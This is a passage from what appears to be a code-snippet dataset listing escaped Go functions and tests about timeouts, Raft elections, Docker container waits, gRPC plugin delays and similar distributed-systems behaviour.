dvlirClient.NTPServerTest(\"de.pool.ntp.org\")\n\tif !assert.NoError(t, err, \"Error while testing NTP server\") {\n\t\treturn\n\t}\n\tif code == 2 {\n\t\tfmt.Println(\"Please wait at least 30 seconds before repeating this request\")\n\t}\n\tif !assert.Equal(t, 1, code, \"Device didn't return correct return value\") {\n\t\treturn\n\t}\n\n\tfmt.Println(code)\n\n\tdefer func() {\n\t\terr = dvlirClient.Logout()\n\t\tif !assert.NoError(t, err, \"Error during Logout\") {\n\t\t\treturn\n\t\t}\n\t}()\n}", "func TestPoolTimeout(t *testing.T) {\n\tdefer leaktest.CheckTimeout(t, time.Second)()\n\n\tgo func() {\n\t\tfor {\n\t\t\ttime.Sleep(time.Second)\n\t\t}\n\t}()\n}", "func TestNodeTick(t *testing.T) {\n\tn := newTestNode(1, []uint64{2, 3}, 0)\n\tr := n.raft\n\tgo n.run()\n\telapsed := r.electionElapsed\n\tn.Tick()\n\n\tfor len(n.tickc) != 0 {\n\t\ttime.Sleep(100 * time.Millisecond)\n\t}\n\n\tn.Stop()\n\tif r.electionElapsed != elapsed+1 {\n\t\tt.Errorf(\"elapsed = %d, want %d\", r.electionElapsed, elapsed+1)\n\t}\n}", "func (p *MockProvisionerClient) Timeout() time.Duration {\n\treturn 30 * time.Second\n}", "func (s *DockerSuite) TestWaitBlockedExitRandom(c *check.C) {\n\t// Cannot run on Windows as trap in Windows busybox does not support trap in this way.\n\ttestRequires(c, DaemonIsLinux)\n\tout, _ := dockerCmd(c, \"run\", \"-d\", \"busybox\", \"/bin/sh\", \"-c\", \"trap 'exit 99' TERM; while true; do usleep 10; done\")\n\tcontainerID := strings.TrimSpace(out)\n\tc.Assert(waitRun(containerID), checker.IsNil)\n\n\tchWait := make(chan error)\n\twaitCmd := exec.Command(dockerBinary, \"wait\", containerID)\n\twaitCmdOut := bytes.NewBuffer(nil)\n\twaitCmd.Stdout = waitCmdOut\n\tc.Assert(waitCmd.Start(), checker.IsNil)\n\tgo func() {\n\t\tchWait <- waitCmd.Wait()\n\t}()\n\n\tdockerCmd(c, \"stop\", containerID)\n\n\tselect {\n\tcase err := <-chWait:\n\t\tc.Assert(err, checker.IsNil, check.Commentf(waitCmdOut.String()))\n\t\tstatus, err := waitCmdOut.ReadString('\\n')\n\t\tc.Assert(err, checker.IsNil)\n\t\tc.Assert(strings.TrimSpace(status), checker.Equals, \"99\", check.Commentf(\"expected exit 99, got %s\", status))\n\tcase <-time.After(2 * time.Second):\n\t\twaitCmd.Process.Kill()\n\t\tc.Fatal(\"timeout waiting for `docker wait` to exit\")\n\t}\n}", "func TestTimeout(t *testing.T) {\n\tstderr := &bytes.Buffer{}\n\tstdout := &bytes.Buffer{}\n\tinv := Invocation{\n\t\tDir: \"testdata/context\",\n\t\tStdout: stdout,\n\t\tStderr: stderr,\n\t\tArgs: []string{\"timeout\"},\n\t\tTimeout: time.Duration(100 * time.Millisecond),\n\t}\n\tcode := Invoke(inv)\n\tif code != 1 {\n\t\tt.Fatalf(\"expected 1, but got %v, stderr: %q, stdout: %q\", code, stderr, stdout)\n\t}\n\tactual := stdout.String()\n\texpected := regexp.QuoteMeta(\"E | context deadline exceeded\\n\")\n\n\tif matched, _ := regexp.MatchString(expected, actual); !matched {\n\t\tt.Fatalf(\"expected %q, but got %q\", expected, actual)\n\t}\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func (e *EvtFailureDetector) timeout() {\n\t// TODO(student): Implement timeout procedure\n\t// Based on Algorithm 2.7: Increasing Timeout at page 55\n\t//if alive ∩ suspected != ∅ then:\n\tif len(e.intersection(e.alive, e.suspected)) > 0 {\n\t\t//delay := delay +Δ;\n\t\te.delay = e.delay + e.delta\n\t}\n\t// forall p ∈ Π do\n\tfor _, nodeID := range e.nodeIDs {\n\t\t// if (p !∈ alive) ∧ (p !∈ suspected) then\n\t\tif e.inAlive(nodeID) == false && e.inSuspected(nodeID) == false {\n\t\t\t//suspected := suspected ∪{p};\n\t\t\te.suspected[nodeID] = true\n\t\t\t//trigger P, Suspect | p;\n\t\t\te.sr.Suspect(nodeID)\n\t\t\t//else if (p ∈ alive) ∧ (p ∈ suspected) then\n\t\t} else if e.inAlive(nodeID) && e.inSuspected(nodeID) {\n\t\t\t//suspected := suspected \\{p};\n\t\t\tdelete(e.suspected, nodeID)\n\t\t\t//e.suspected[nodeID] = false\n\t\t\t//trigger P, Restore | p;\n\t\t\te.sr.Restore(nodeID)\n\t\t}\n\t\t//trigger pl, Send | p, [HEARTBEATREQUEST];\n\t\thbReq := Heartbeat{From: e.id, To: nodeID, Request: true}\n\t\te.hbSend <- hbReq\n\t}\n\t//alive := ∅;\n\temptyAlive := make(map[int]bool)\n\te.alive = emptyAlive\n\t//starttimer(delay);\n\te.timeoutSignal.Stop()\n\te.timeoutSignal = time.NewTicker(e.delay)\n}", "func TestTimeouts(t *testing.T) {\n\tt.Parallel()\n\tvar testCases = []struct {\n\t\tdesc string\n\t\tcallTimeout time.Duration\n\t\tpluginDelay time.Duration\n\t\tkubeAPIServerDelay time.Duration\n\t\twantErr string\n\t}{\n\t\t{\n\t\t\tdesc: \"timeout zero - expect failure when call from kube-apiserver arrives before plugin starts\",\n\t\t\tcallTimeout: 0 * time.Second,\n\t\t\tpluginDelay: 3 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout zero but kms-plugin already up - still failure - zero timeout is an invalid value\",\n\t\t\tcallTimeout: 0 * time.Second,\n\t\t\tpluginDelay: 0 * time.Second,\n\t\t\tkubeAPIServerDelay: 2 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout greater than kms-plugin delay - expect success\",\n\t\t\tcallTimeout: 6 * time.Second,\n\t\t\tpluginDelay: 3 * time.Second,\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout less than kms-plugin delay - expect failure\",\n\t\t\tcallTimeout: 3 * time.Second,\n\t\t\tpluginDelay: 6 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t}\n\n\tfor _, tt := range testCases {\n\t\ttt := tt\n\t\tt.Run(tt.desc, func(t *testing.T) {\n\t\t\tt.Parallel()\n\t\t\tvar (\n\t\t\t\tservice Service\n\t\t\t\terr error\n\t\t\t\tdata = []byte(\"test data\")\n\t\t\t\tkubeAPIServerWG sync.WaitGroup\n\t\t\t\tkmsPluginWG sync.WaitGroup\n\t\t\t\ttestCompletedWG sync.WaitGroup\n\t\t\t\tsocketName = newEndpoint()\n\t\t\t)\n\n\t\t\ttestCompletedWG.Add(1)\n\t\t\tdefer testCompletedWG.Done()\n\n\t\t\tctx := testContext(t)\n\n\t\t\tkubeAPIServerWG.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// Simulating late start of kube-apiserver - plugin is up before kube-apiserver, if requested by the testcase.\n\t\t\t\ttime.Sleep(tt.kubeAPIServerDelay)\n\n\t\t\t\tservice, err = NewGRPCService(ctx, socketName.endpoint, tt.callTimeout)\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Errorf(\"failed to create envelope service, error: %v\", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tdefer destroyService(service)\n\t\t\t\tkubeAPIServerWG.Done()\n\t\t\t\t// Keeping kube-apiserver up to process requests.\n\t\t\t\ttestCompletedWG.Wait()\n\t\t\t}()\n\n\t\t\tkmsPluginWG.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// Simulating delayed start of kms-plugin, kube-apiserver is up before the plugin, if requested by the testcase.\n\t\t\t\ttime.Sleep(tt.pluginDelay)\n\n\t\t\t\t_ = mock.NewBase64Plugin(t, socketName.path)\n\n\t\t\t\tkmsPluginWG.Done()\n\t\t\t\t// Keeping plugin up to process requests.\n\t\t\t\ttestCompletedWG.Wait()\n\t\t\t}()\n\n\t\t\tkubeAPIServerWG.Wait()\n\t\t\tif t.Failed() {\n\t\t\t\treturn\n\t\t\t}\n\t\t\t_, err = service.Encrypt(data)\n\n\t\t\tif err == nil && tt.wantErr != \"\" {\n\t\t\t\tt.Fatalf(\"got nil, want %s\", tt.wantErr)\n\t\t\t}\n\n\t\t\tif err != nil && tt.wantErr == \"\" {\n\t\t\t\tt.Fatalf(\"got %q, want nil\", err.Error())\n\t\t\t}\n\n\t\t\t// Collecting kms-plugin - allowing plugin to clean-up.\n\t\t\tkmsPluginWG.Wait()\n\t\t})\n\t}\n}", "func (rf *Raft) heartbeatTimeoutCheck() {\n\t// get heartbeat check start time\n\tlastHeartbeatCheck := time.Now()\n\ti := 0\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.electionTimeout > 0 && rf.state == Follower {\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastHeartbeatCheck))\n\t\t\tlastHeartbeatCheck = currentTime\n\t\t\tif i%10 == 0 { // decrease log density\n\t\t\t\trf.Log(LogDebug, \"timeout remaining:\", rf.electionTimeout)\n\t\t\t}\n\t\t} else if rf.state == Follower {\n\t\t\t// election needs to occur\n\t\t\t// quit this function and run the election\n\t\t\trf.Log(LogInfo, \"timed out as follower, running election.\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ti++\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (m *Machine) timedOut() error {\n\t// no max time specified, i.e. we can go on forever.\n\tif m.MaxRuntime == 0 {\n\t\treturn nil\n\t}\n\n\truntime := time.Now().Sub(m.StartedAt)\n\n\tif runtime > m.MaxRuntime {\n\t\treturn fmt.Errorf(\"Timed out after %f seconds\", runtime.Seconds())\n\t}\n\n\treturn nil\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func TestRetryWorkflowOnTimeout(t *testing.T) {\n\tconst expectedCallCount = 3\n\tactualCallCount := atomic.Int32{}\n\n\tr := task.NewTaskRegistry()\n\tr.AddOrchestratorN(\"FlakyWorkflow\", func(ctx *task.OrchestrationContext) (any, error) {\n\t\t// update this global counter each time the workflow gets invoked\n\t\tacc := actualCallCount.Add(1)\n\t\tif acc < expectedCallCount {\n\t\t\t// simulate a hang for the first two calls\n\t\t\ttime.Sleep(5 * time.Minute)\n\t\t}\n\t\treturn acc, nil\n\t})\n\n\tctx := context.Background()\n\tclient, engine := startEngine(ctx, t, r)\n\n\t// Set a really short timeout to override the default workflow timeout so that we can exercise the timeout\n\t// handling codepath in a short period of time.\n\tengine.SetWorkflowTimeout(1 * time.Second)\n\n\t// Set a really short reminder interval to retry workflows immediately after they time out.\n\tengine.SetActorReminderInterval(1 * time.Millisecond)\n\n\tfor _, opt := range GetTestOptions() {\n\t\tt.Run(opt(engine), func(t *testing.T) {\n\t\t\tactualCallCount.Store(0)\n\n\t\t\tid, err := client.ScheduleNewOrchestration(ctx, \"FlakyWorkflow\")\n\t\t\trequire.NoError(t, err)\n\t\t\t// Add a 5 second timeout so that the test doesn't take forever if something isn't working\n\t\t\ttimeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)\n\t\t\tdefer cancel()\n\n\t\t\tmetadata, err := client.WaitForOrchestrationCompletion(timeoutCtx, id)\n\t\t\trequire.NoError(t, err)\n\t\t\tassert.True(t, metadata.IsComplete())\n\t\t\tassert.Equal(t, fmt.Sprintf(\"%d\", expectedCallCount), metadata.SerializedOutput)\n\t\t})\n\t}\n}", "func (suite *KeeperTestSuite) TestOnTimeoutPacket() {\n\tdata := types.NewFungibleTokenPacketData(prefixCoins2, testAddr1.String(), testAddr2.String())\n\ttestCoins2 := sdk.NewCoins(sdk.NewCoin(\"bank/firstchannel/atom\", sdk.NewInt(100)))\n\n\ttestCases := []struct {\n\t\tmsg string\n\t\tmalleate func()\n\t\tsource bool\n\t\texpPass bool\n\t}{\n\t\t{\"successful timeout from source chain\",\n\t\t\tfunc() {\n\t\t\t\tescrow := types.GetEscrowAddress(testPort1, testChannel1)\n\t\t\t\t_, err := suite.chainA.App.BankKeeper.AddCoins(suite.chainA.GetContext(), escrow, sdk.NewCoins(sdk.NewCoin(\"atom\", sdk.NewInt(100))))\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}, true, true},\n\t\t{\"successful timeout from external chain\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount = testCoins2\n\t\t\t}, false, true},\n\t\t{\"no source prefix on coin denom\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount = prefixCoins2\n\t\t\t}, false, false},\n\t\t{\"unescrow failed\",\n\t\t\tfunc() {\n\t\t\t}, true, false},\n\t\t{\"mint failed\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount[0].Denom = prefixCoins2[0].Denom\n\t\t\t\tdata.Amount[0].Amount = sdk.ZeroInt()\n\t\t\t}, true, false},\n\t}\n\n\tpacket := channeltypes.NewPacket(data.GetBytes(), 1, testPort1, testChannel1, testPort2, testChannel2, 100, 0)\n\n\tfor i, tc := range testCases {\n\t\ttc := tc\n\t\ti := i\n\t\tsuite.Run(fmt.Sprintf(\"Case %s\", tc.msg), func() {\n\t\t\tsuite.SetupTest() // reset\n\n\t\t\ttc.malleate()\n\n\t\t\tvar denom string\n\t\t\tif tc.source {\n\t\t\t\tprefix := types.GetDenomPrefix(packet.GetDestPort(), packet.GetDestChannel())\n\t\t\t\tdenom = prefixCoins2[0].Denom[len(prefix):]\n\t\t\t} else {\n\t\t\t\tdenom = data.Amount[0].Denom\n\t\t\t}\n\n\t\t\tpreCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\n\t\t\terr := suite.chainA.App.TransferKeeper.OnTimeoutPacket(suite.chainA.GetContext(), packet, data)\n\n\t\t\tpostCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\t\t\tdeltaAmount := postCoin.Amount.Sub(preCoin.Amount)\n\n\t\t\tif tc.expPass {\n\t\t\t\tsuite.Require().NoError(err, \"valid test case %d failed: %s\", i, tc.msg)\n\t\t\t\tsuite.Require().Equal(prefixCoins2[0].Amount.Int64(), deltaAmount.Int64(), \"successful timeout did not trigger refund\")\n\t\t\t} else {\n\t\t\t\tsuite.Require().Error(err, \"invalid test case %d passed: %s\", i, tc.msg)\n\t\t\t}\n\t\t})\n\t}\n}", "func TestRandomUint64(t *testing.T) {\n\ttries := 1 << 8 // 2^8\n\twatermark := uint64(1 << 56) // 2^56\n\tmaxHits := 5\n\tbadRNG := \"The random number generator on this system is clearly \" +\n\t\t\"terrible since we got %d values less than %d in %d runs \" +\n\t\t\"when only %d was expected\"\n\n\tnumHits := 0\n\tfor i := 0; i < tries; i++ {\n\t\tnonce, err := RandomUint64()\n\t\tif err != nil {\n\t\t\tt.Errorf(\"RandomUint64 iteration %d failed - err %v\",\n\t\t\t\ti, err)\n\t\t\treturn\n\t\t}\n\t\tif nonce < watermark {\n\t\t\tnumHits++\n\t\t}\n\t\tif numHits > maxHits {\n\t\t\tstr := fmt.Sprintf(badRNG, numHits, watermark, tries, maxHits)\n\t\t\tt.Errorf(\"Random Uint64 iteration %d failed - %v %v\", i,\n\t\t\t\tstr, numHits)\n\t\t\treturn\n\t\t}\n\t}\n}", "func testNoNilTimeoutReplacement(ctx context.Context, t *testing.T, w *Wallet) {\n\terr := w.Unlock(ctx, testPrivPass, nil)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\ttimeChan := make(chan time.Time)\n\terr = w.Unlock(ctx, testPrivPass, timeChan)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet with time channel\")\n\t}\n\tselect {\n\tcase timeChan <- time.Time{}:\n\tcase <-time.After(100 * time.Millisecond):\n\t\tt.Fatal(\"time channel was not read in 100ms\")\n\t}\n\tif w.Locked() {\n\t\tt.Fatal(\"expected wallet to remain unlocked due to previous unlock without timeout\")\n\t}\n}", "func (l *Logger) SeedTimeout(d core.Digest, infoHash core.InfoHash) {\n\tl.zap.Debug(\n\t\t\"Seed timeout\",\n\t\tzap.String(\"name\", d.Hex()),\n\t\tzap.String(\"info_hash\", infoHash.String()))\n}", "func TestTCPProbeTimeout(t *testing.T) {\n\tprobeExpectTimeout(t, 49)\n\tprobeExpectTimeout(t, 50)\n\tprobeExpectTimeout(t, 51)\n}", "func TestTransportTimeoutServerHangs(t *testing.T) {\n\tclientDone := make(chan struct{})\n\tct := newClientTester(t)\n\tct.client = func() error {\n\t\tdefer ct.cc.(*net.TCPConn).CloseWrite()\n\t\tdefer close(clientDone)\n\n\t\tbuf := make([]byte, 1<<19)\n\t\t_, err := rand.Read(buf)\n\t\tif err != nil {\n\t\t\tt.Fatal(\"fail to gen random data\")\n\t\t}\n\t\theaderVal := hex.EncodeToString(buf)\n\n\t\treq, err := http.NewRequest(\"PUT\", \"https://dummy.tld/\", nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tctx, cancel := context.WithTimeout(context.Background(), 1*time.Second)\n\t\tdefer cancel()\n\t\treq = req.WithContext(ctx)\n\t\treq.Header.Add(\"Authorization\", headerVal)\n\t\t_, err = ct.tr.RoundTrip(req)\n\t\tif err == nil {\n\t\t\treturn errors.New(\"error should not be nil\")\n\t\t}\n\t\tif ne, ok := err.(net.Error); !ok || !ne.Timeout() {\n\t\t\treturn fmt.Errorf(\"error should be a net error timeout was: +%v\", err)\n\t\t}\n\t\treturn nil\n\t}\n\tct.server = func() error {\n\t\tct.greet()\n\t\tselect {\n\t\tcase <-time.After(5 * time.Second):\n\t\tcase <-clientDone:\n\t\t}\n\t\treturn nil\n\t}\n\tct.run()\n}", "func TestRandomNonNegativity(t *testing.T) {\n\tref := randWords(30)\n\tfor i := 0; i < len(ref); i++ {\n\t\tfor j := 0; j < len(wordsEnglish); j++ {\n\t\t\ta := Distance(wordsEnglish[ref[i]], wordsEnglish[j])\n\t\t\tpositive := a >= 0\n\t\t\tif positive != true {\n\t\t\t\tt.Errorf(\"expected a >= 0, got %d (seed=%d, ref=#%d-%s, case=#%d-%s)\",\n\t\t\t\t\ta, seed, ref[i], wordsEnglish[ref[i]], j, wordsEnglish[j],\n\t\t\t\t)\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := 